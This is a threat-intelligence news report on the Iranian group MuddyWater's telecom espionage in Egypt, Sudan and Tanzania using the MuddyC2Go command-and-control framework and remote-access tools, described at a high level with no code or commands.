Iranian hackers affiliated with the nation-state actor known as MuddyWater have been conducting telecom espionage attacks in Africa using a new command-and-control (C2) framework called MuddyC2Go. The attacks have primarily targeted the telecommunications sector in Egypt, Sudan, and Tanzania. MuddyWater, which is believed to be affiliated with Iran’s Ministry of Intelligence and Security, has been active since at least 2017 and focuses on entities in the Middle East. The use of MuddyC2Go was first discovered by Deep Instinct, and evidence suggests it may have been in use since 2020.
The full capabilities of MuddyC2Go are not yet known, but it includes an executable that automatically connects to the hackers’ C2 server, giving them remote access to the victim system without the need for manual execution. The recent attacks in November 2023 also involved the use of SimpleHelp and Venom Proxy, along with a custom keylogger and other publicly available tools. MuddyWater’s attack chains typically involve weaponizing phishing emails and exploiting known vulnerabilities in unpatched applications for initial access, followed by conducting reconnaissance, lateral movement, and data collection.
In one documented attack on a telecommunications organization, the MuddyC2Go launcher was used to establish contact with an attacker-controlled server, while legitimate remote access software like AnyDesk and SimpleHelp were deployed. The attackers had previously compromised the entity earlier in 2023 using SimpleHelp to launch PowerShell and deliver proxy software. Another telecommunications and media company targeted by the hackers saw multiple incidents of SimpleHelp connecting to known Seedworm infrastructure, along with the use of a custom build of the Venom Proxy hacktool and a new custom keylogger.
MuddyWater seeks to evade detection for as long as possible by using a combination of bespoke, living-off-the-land, and publicly available tools in its attack chains. The group continues to innovate and develop its toolset to stay under the radar. PowerShell and PowerShell-related tools and scripts are still heavily used by the group, highlighting the need for organizations to be vigilant about suspicious PowerShell activity on their networks.